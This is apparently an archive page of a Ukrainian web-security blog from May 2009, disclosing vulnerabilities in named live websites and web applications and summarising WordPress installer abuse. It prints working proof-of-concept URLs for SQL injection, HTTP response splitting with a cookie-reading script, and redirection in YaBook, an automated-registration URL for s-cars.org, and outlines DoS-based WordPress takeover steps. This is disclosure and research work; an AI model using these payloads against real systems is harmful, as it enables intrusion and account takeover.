Архів для категорії 'Уразливості'

Уразливості на www.kp.ru

20:34 21.05.2009

27.01.2009

У березні, 19.03.2008, я знайшов Cross-Site Scripting уразливості на проекті http://www.kp.ru (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

21.05.2009

XSS:

Дані уразливості досі не виправлені.

Сайт users.kharkiv.com інфікований

23:58 20.05.2009

Мені періодично доводиться стикатися з інфікованими сайтами в Уанеті. Раніше я вже писав про інфікований сайт www.doski.zp.ua.

Сьогодні, під час пошуку в Гуглі, я виявив ще один заражений сайт - http://users.kharkiv.com. Бо Google повідомив стосовно нього, що “Ця сторінка може заподіяти шкоду вашому комп’ютерові”. На сайті інфіковано вісім сторінок користувача users.kharkiv.com/bereginya/.

Після того, як я сам перевірив сайт користувача bereginya (сайт в рамках users.kharkiv.com), я впевнився, що він інфікований. Сайт переповнений шкідливими кодами - на кожній сторінці даного сайту розміщені численні шкідливі JavaScript коди.

Адміністрації users.kharkiv.com (і зокрема користувачу bereginya) варто витерти шкідливі коди з сайта і почати серйозно слідкувати за безпекою власного сайта.

Добірка уразливостей

16:19 20.05.2009

В даній добірці уразливості в веб додатках:

  • Access violation and limited informations disclosure in webcamXP 3.72.440.0 (деталі)
  • Maian Support v1.3 Xss Vulnerabilities (деталі)
  • Maian Recipe v1.2 Xss Vulnerabilities (деталі)
  • Maian Music v1.1 Multiple Vulnerabilities (Xss/SQL Injection) (деталі)
  • Maian Links v3.1 XSS Vulnerabilities (деталі)
  • Maian Cart v1.1 XSS Vulnerabilities (деталі)
  • JRockit: Multiple vulnerabilities (деталі)
  • Sun JDK Image Parsing Library Vulnerabilities (More ICC Parsing) (деталі)
  • Sun JDK image parsing vulnerabilities (деталі)
  • US-CERT Technical Cyber Security Alert TA08-066A — Sun Updates for Multiple Vulnerabilities in Java (деталі)

Уразливості на www.blog.privatbank.ua

19:34 19.05.2009

18.12.2008

У лютому, 05.02.2008, я знайшов Insufficient Anti-automation уразливість, а з часом також Cross-Site Request Forgery, SQL Injection та Cross-Site Scripting уразливості на сайті http://www.blog.privatbank.ua (блог ПриватБанка). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно банка ПриватБанк раніше я вже писав про уразливості на www.privatbank.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

19.05.2009

На сайті використовується плагін CapCC для WordPress, про уразливості в якому я вже розповідав.

На даному сайті є наступні уразливості (в плагіні CapCC): Insufficient Anti-automation, Cross-Site Request Forgery, SQL Injection та Cross-Site Scripting (reflected та persistent).

Дані уразливості досі не виправлені. Що традиційно для ПриватБанка.

Атака на Abuse of Functionality в WordPress

22:43 18.05.2009

Нещодавно я писав про Abuse of Functionality уразливість в WordPress. Яку виявив Jeff Starr, власник сайта perishablepress.com, коли в нього на сервері відбувся сбій MySQL. До неї уразливі всі версії движка - WordPress 2.7.1 та попередні версії.

Я знаходив чимало уразливостей в WordPress і його плагінах, але на можливість цієї уразливості я не звернув уваги (мабуть тому, що завжди видаляю інсталяційні файли після інсталяції ;-) ). Зате на це звернув увагу Jeff, коли в нього виникли проблеми на сайті. До речі, в своєму записі Important Security Fix for WordPress Jeff навів декілька рекомендацій по виправленню цієї уразливості.

Дана уразливість пов’язана з інсталяційними файлами, якщо вони знаходяться на сервері. І я розробив декілька варіантів атаки на дану Abuse of Functionality уразливість в WordPress.

Як я писав, інсталятор WP повинен перевіряти, чи не встановлений движок. І якщо він встановлений, то виводити відповідне повідомлення. Але у випадку, коли має місце збій MySQL, він цього не перевіряє і дає переінстялювати движок.

Зокрема, як зазначив Jeff, у випадку коли database (що вказана в налаштуваннях WP) повністю відсутня, то інсталятор WP думає, що движок не встановлений і виводить інсталяційний діалог. Також, під час досліджень, я виявив можливість інших варіантів атаки.

Можна атакувати сайт навіть коли є database движка і присутній зв’язок з MySQL, але при цьому є збій в одній з таблиць WP (яку перевіряє інсталятор). Зокрема, атака можлива коли пошкоджена таблиця wp_options (в WordPress 2.6.2), або wp_users (в WordPress 2.0.3 та 2.0.11). Тобто в різних версіях WP різні таблиці є головними при перевірці в інсталяторі - це може бути або таблиця wp_options або wp_users (наврядчи ще якась інша таблиця буде головною для інсталятора в інших версіях WP).

Варіанти атаки на сайт на WordPress (на якому міститься інсталятор):

1. У випадку, коли на сайті відбувся подібний збій з MySQL і виведиться діалог інсталятора, то можна атакувати сайт. Враховуючи, що це дуже малоімовірно, і потрібно ще зафіксувати час даного збою, то варто використати інший варіант атаки.

2. Зробити DoS атаку на MySQL для атаки на WordPress. За рахунок DoS атаки відбудеться збій при зв’язку з MySQL і потенційно інсталятор може вивести діалог інсталяції. Хоча в більшості випадків зв’язок з СУБД буде повністю відсутній й інсталятор виведе відповідне повідомлення.

3. За рахунок автоматизованої атаки на MySQL (через Insufficient Anti-automation уразливості в WP) можна призвести до збою в одній з головних таблиць (що також є DoS атакою). І в такому разі спрацює інсталятор движка.

Зокрема для WordPress 2.0.x та інших версій движка, де інсталятор перевіряє wp_users, цього можна добитися через автоматизовану реєстрацію користувачів. Якщо активно реєструвати користувачів на сайті, може виникнути збій в таблиці wp_users і відповідно движок не зможе її прочитати і виведе діалог інсталятора.

P.S.

Зробив відео демонстрацію DoS атаки на WordPress.

Добірка уразливостей

15:24 18.05.2009

В даній добірці уразливості в веб додатках:

  • blur6ex-0.3.462 LOCAL FILE INCLUSION Vulnerbility (деталі)
  • Two heap overflow in Foxit WAC Server 2.0 Build 3503 (деталі)
  • Maian Search v1.1 Multiple Vulnerabilities (XSS/SQL INJECTION) (деталі)
  • Maian Gallery v2.0 XSS Vulnerability (деталі)
  • Maian Guestbook v3.2 XSS Vulnerabilities (деталі)
  • Maian Weblog v4.0 XSS Vulnerabilities (деталі)
  • Maian Greeting v2.1 Multiple Vulnerabilities (XSS/SQL INJECTION) (деталі)
  • Mozilla Foundation Security Advisory 2007-36 (деталі)
  • Mozilla Foundation Security Advisory 2007-38 (деталі)
  • Mozilla Foundation Security Advisory 2007-39 (деталі)

Abuse of Functionality уразливість в WordPress

23:52 16.05.2009

Як повідомив blogsecurity.net, нещодавно була знайдена Abuse of Functionality уразливість в WordPress. Уразливі WordPress 2.7.1 та попередні версії.

Уразливість пов’язана з інсталяційними файлами, якщо вони знаходяться на сервері (якщо ви їх не видалили, що завжди рекомендується робити після інсталяції). Дану уразливість виявив власник сайта perishablepress.com, коли в нього на сервері відбувся сбій MySQL.

При відсутності зв’язку з СУБД, WordPress повинен видавати стандарте повідомлення про помилку. Так він робив завжди в усіх версіях (зокрема в 2.x). Але як виявилось, в тому випадку, коли є збій MySQL (наприклад, коли пошкоджені таблиці движка) і при цьому інсталяційні файли WP є на сервері, то WordPress гадає, що движок ще не був встановлений і виводить інсталяційний діалог.

Істалятор WP повинен перевіряти, чи не встановлений движок. І якщо він встановлений, то виводити відповідне повідомлення. Але в даному рідкому випадку, коли має місце збій MySQL, він цього не перевіряє і дає переінстялювати движок.

Для цього лише потрібно ввести назву сайта і емайл, після чого движок буде оновлений. І відповідно створений новий акаунт адміна, що дозволить похакати сайт. З чим і стикнувся власник сайта perishablepress.com, коли ледве відбився (бо вчасно виявив проблему) від бажаючих переінсталювати движок на його сайті :-) .

Уразливості в YaBook

20:04 16.05.2009

21.01.2009

В лютому, 17.02.2008, я знайшов SQL Injection, Redirector, HTTP Response Splitting та Information Leakage уразливості, а сьогодні ще й Full path disclosure в YaBook. Це гостьова книга. Дірки виявив на сайті розробника YaBook. Про що найближчим часом повідомлю розробнику веб додатку.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробнику додатку.

16.05.2009

SQL Injection:

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20version()

Redirector (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'http://websecurity.com.ua'

HTTP Response Splitting (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E'

Працює на старих версіях PHP.

Information Leakage:

http://site/guestbook/index.php

В meta-тегах виводиться інформація про версію PHP, MySQL і веб сервера.

Full path disclosure:

http://site/guestbook/config.inc.php

Full path disclosure (через SQL Injection):

http://site/guestbook/index.php?action=jump&id=-1%20union%20select%20'%0A1'

Уразлива версія YaBook 0.98.1-alpha та попередні версії.

В версії YaBook 0.98.2-alpha автор виправив дані уразливості.

Уразливості на www.s-cars.org

23:57 15.05.2009

У липні, 19.07.2008, я знайшов Insufficient Anti-automation та Cross-Site Scripting уразливості на сайті http://www.s-cars.org. Про що найближчим часом сповіщу адміністрацію сайта. Дані уразливості в PostNuke Phoenix, про які я писав раніше.

Insufficient Anti-automation:

http://www.s-cars.org/postnuke/user.php?uname=test&pass=12345&vpass=12345&email=test@test.com&vemail=test@test.com&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

На сайті використовується WAF, який я легко обійшов. За допомогою self-contained XSS.

Добірка уразливостей

16:27 15.05.2009

В даній добірці уразливості в веб додатках:

  • BlackBook v1.0 Multiple XSS Vulnerabilities (деталі)
  • vlBook 1.21 (ALL VERSION) Multiple Remote Vulnerabilities (LFI/XSS) (деталі)
  • mjguest 6.7 (ALL VERSION) Xss & Redirection Vuln (деталі)
  • php-addressbook v2.0 Multiple Remote Vulnerabilities (LFI/XSS) (деталі)
  • SiteXS CMS Remote File Upload Vulnerability (деталі)
  • Fixed: LiveCart SQL injection vulnerability fixed since version 1.1.2 (деталі)
  • Mozilla Foundation Security Advisory 2007-32 (деталі)
  • Mozilla Foundation Security Advisory 2007-33 (деталі)
  • Mozilla Foundation Security Advisory 2007-34 (деталі)
  • Mozilla Foundation Security Advisory 2007-35 (деталі)